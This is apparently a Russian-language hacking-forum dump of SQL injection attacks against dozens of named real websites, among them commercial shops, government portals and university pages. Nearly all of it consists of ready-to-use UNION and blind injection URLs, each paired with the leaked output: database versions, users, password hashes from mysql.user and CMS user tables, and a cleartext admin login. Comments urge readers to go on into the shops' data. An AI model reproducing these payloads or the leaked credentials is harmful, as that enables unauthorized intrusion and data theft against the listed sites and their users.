SQL Инъекции

boiteaoutils.cidem.org PageRank - 6

PHP:

http://boiteaoutils.cidem.org/produits.php?theme=-2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6+--+


4.0.25-standard-log:[email protected]:cidemoutils

www.turbazar.ru - PageRank - 5 ТиЦ -300 вывод в титле

PHP:

http://www.turbazar.ru/index.php?s=3&c=12&m=46&id_hotel=29+union+select+1,2,concat_ws(0x3A,@@version,user(),database())+--+


Версия : 5.0.67
Юзер : [email protected]
База : grandtour

PHP:

http://www.turbazar.ru/index.php?s=3&c=12&m=46&id_hotel=29+union+select+1,2,concat_ws(0x3A,user,password,host,file_priv,user())+from+mysql.user+--+


grandtour:*F28B6D83F6F364EE8B7B69BE4113813DF72EAD96:80.84.119.24:Y:[email protected]

В базе есть пару шопов , ну дальше сами.

 

http://hembar.ru//index.php?option=com_assortment&task=view&id=1{sqlinj}

Database Version: 5.0.45-log
Database name: hembar
User name: root@localhost

!!!FILE_PRIV=YES!!!

 

Санкт-Петербургский Английский клуб

User: [email protected]
Database: engclub9_akdb
Version: 4.0.27-max-log

 

gov:

Code:

http://www.fo1.dswd.gov.ph/articledetails.php?id=-273+union+select+1,2,concat(user,0x3a,password),4,5,6+FROM+mysql.user

http://www.shandongbusiness.gov.cn/public/zhuanti/kxfzg/index_ok2.php?id=-33+union+select+1,concat(user,0x3a,password),3,4,5,6+FROM+mysql.user

http://support.aide.gov.tw/sub_page_index.php?c_id=35&c_parentid=22&c_rootid=-5+union+select+1,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14+from+mysql.user

И:

Code:

http://web272.login-1.hoststar.at/mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+mos_users

http://www.tsv-kelbachgrund.net/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://mobefree.ru/wap/wapmain.php?option=news&action=link&id=-19141+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://www.toalgenclik.com/wap/wapmain.php?option=onews&action=cat&id=-1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://www.mazdaeff.net/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://www.taxibalk.net/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mos_users+limit+0,1--

http://gozopolitan.org/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--

http://www.abilieve2005.de/mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+mos_users

 

http://community.realitytvworld.com/gallery/showgallery.php?cat=-1+union+select+1,concat(0x3a3a,concat_ws(0x3a3a,username,password,icq,email)),3+from+ppusers+limit+0,1--

login: Admin
pass:02b2ea2e07bf23853ee3b1c3798b5b0c(не подбрутился)

буржуйская куйня. ипическое количество юзеров

 

Pagerank: 5
тИЦ: 1200

Code:

http://www.etver.ru/lenta/index.php?newsid=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9--

Database Version : 4.1.25-log
Database name : etver
User name : etver@localhost

----------------------------------------#

Pagerank: 4
тИЦ: 700

Code:

http://www.horseworld.ru/?news=-1+union+select+1,2,concat _ws(0x 3a,version(),database(),user()),4,5,6--

Database Version : 5.1.22-rc
Database name : horseworld
User name : [email protected]

 

http://www.hellokids.ro/produse/imbracaminte-copii/rochii/fete/1/3/pagina1.html?varsta=1+AND+ASCII(SUBSTRING((select+version() ),1,1))>x--

x=53,46,48,46,54,55,45,99,111,109,109,117,110,105,116,121

http://www.hellokids.ro/produse/imbracaminte-copii/rochii/fete/1/3/pagina1.html?varsta=1+AND+ASCII(SUBSTRING((select+database() ),1,1))>x--

x=104,101,108,108,111,107,105,100,115

http://www.hellokids.ro/produse/imbracaminte-copii/rochii/fete/1/3/pagina1.html?varsta=1+AND+ASCII(SUBSTRING((select+user() ),1,1))>x--

x=104,101,108,108,111,107,105,100,115,64,108,111,99,97,108,104,111,115,116


Version : 5.0.67-community
Database: hellokids
User : hellokids@localhost

 

www.aromat.ru PageRank - 5 ТиЦ - 450 (вывод в титле)

PHP:

http://www.aromat.ru/parfum/women_type.php3?tip=-3+union+select+concat_ws(0x3A,user(),@@version,database())+--+


user() - [email protected]
@@version - 5.0.60-log
database() - aromat

 

http://www.reporterspecialdearges.ro/_articol/Singuratate-liberala-intr-un-judet-controlat-de-PSD-/1998/2+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12--/



Database Version: 4.1.21-standard-log
Database name: softpage_arges
User name: softpage_erkro@localhost

 

Mission Cataract USA

Code:

http://www.missioncataractusa.org/news.php?ax=v&n=9&id=9&nid=-3+union+select+1,concat_ws(version(),user(),database()),3,4,5--

версия/юзер/бд:

Code:

[email protected]_cms

-----------------------------------------------------------
The End!

 

Московская торгово-промышленная палата
Pagerank: 6
тИЦ: 1500

Code:

http://www.mostpp.ru/news.php?&id=-1+union+select+1,2,3,4,5,6,7,8,concat_ ws(0x3a ,version(),database(),user()),10,11,12,13,14,15--

Database Version : 5.0.67
Database name : mtpp
User name : [email protected]

В целях безопасности от разных дебилов которые дефейсят сайты палат Москвы и РФ, выкладывать админку я не стал.

 

http://www.termomax.ro/subcateg/-153+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71)/*/Din_aluminiu/


Database Version: 4.1.22-standard-log
Database name: rter1702_termomax
User name: rter1702_termoma@localhost

 

Code:

http://www.radiology.wisc.edu/newsContent.php?id=-189+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10

http://nflrc.msu.edu/login/scripts/workshop.php?id=-189+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10

http://mulibraries.missouri.edu/about/adoptabook/after-details.php?id=-189+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8+from+information_Schema.tables

 

Code:

http://www.playcentre.org.nz/product.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin+limit+0,1--

логин/пасс:

Code:

Justine:purple

---------------------------------------------------------
The End!

 

http://www.martinsgourmet.com/subproduct.php?id=-23+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8&sub=Medium-Mild_Roasts



Database Version: 5.0.75-community-log
Database name: martinsg_gourmet
User name: martinsg_user1@localhost

 

www.stroyolymp.com Pr- 5 ТиЦ - 650

PHP:

http://www.stroyolymp.com/index.php?node=0&category=35+union+select+1,concat_ws(0x3A,user(),version(),database()),3,4,5,6,7,8,9,10,11+--+


user():[email protected]
@@version:4.1.22
datbase:wwwstroyolympcom

www.scooter-club.ru Pr- 5 ТиЦ - 300

PHP:

http://www.scooter-club.ru/index.php?content=yes&page_id=-75+union+select+1,concat_ws(0x3A,user(),@@version,database())+--+


user():scooterc_scooter@localhost
@@version:4.1.22-standard-log
datbase:scooterc_base

webcat.info ТиЦ 1000 вывод в титле

PHP:

http://webcat.info/category/7687615'+union+select+concat_ws(0x3a,user(),version(),database())+--+/start/110/


user():seonetsp@localhost
@@version:5.0.45
datbase:seonetsp_webcat

 

http://www.edituraparalela45.ro/fictiune/detalii_carte.php?titluID=-1421+UNION+SELECT+1,convert(concat_ws(0x3a,version(),database(),user())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30&sess=8c6eb35615f6a055f8dd8ff63c7c7de1&uid=0



Database Version: 5.0.18-log
Database name: edituraparalela4
User name: [email protected].

 

Code:

http://etd.louisville.edu/view-etd.php?ID=-189+union+select+1,2,3,4,5,6,7,8,concat(version(),0x3a,user()),table_name,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables

http://www.westga.edu/~distance/ojdla/search_results_id.php?id=-189+union+Select+1,2,3,concat(version(),0x3a,user()),5,6,7,8,9,10,11

http://striweb.si.edu/esp/tesp/details.php?id=189+AND+ascii(lower(substring(version(),1,1)))=51

http://athletics.gmc.edu/mtennis/article.php?id=-189+union+select+1,2,3,4,5,concat(user(),0x3a,version()),7,8,9,10,11

http://policies.fiu.edu/record_profile.php?id=-189+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users+limit+0,1

http://www.lssu.edu/hr/apjobsdesc.php?id=-189+union+Select+1,2,concat(version(),0x3a,user()),4,5,6,7,8,9

http://www.nmsu.edu/~ucomm/database/show_details.php?ID=-189+union+select+1,2,user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

http://osulibrary.oregonstate.edu/research.php/detail.php?id=189+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user()),12,13,14,15--

http://www.aua.edu/course.php?ID=-189+union+select+1,2,3,concat(user(),0x3a,version()),5,6,7,8,9

http://www.sandiego.edu/news/presskit/detail.php?id=-189+union+select+1,2,3,concat(user(),0x3a,version()),5,6,7,8,9

 

http://www.happyhome.ro/product.php?id=-31+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12/*



Database Version: 4.0.18
Database name: lafix
User name: [email protected]

 

www.tangomania.ru Pr - 3 ТиЦ 325

PHP:

http://www.tangomania.ru/articlesabout.php?uin=-1+union+select+1,2,3,concat_ws(0x3A,user(),version(),database()),5,6,7,8,9+--+

user():tangomania@localhost
@@version:4.1.22-log
database():tangomania

www.prist.ru Pr - 5 ТиЦ 850

PHP:

http://www.prist.ru/produce.php/card/sold.htm?id=453222985123123+union+select+1,2,3,4,5,concat_ws(0x3a,user(),@@version,database()),7,8,9,10,11,12,13,14,15,16+--+


user() : [email protected]
@@version : 4.1.22
database() : prist_db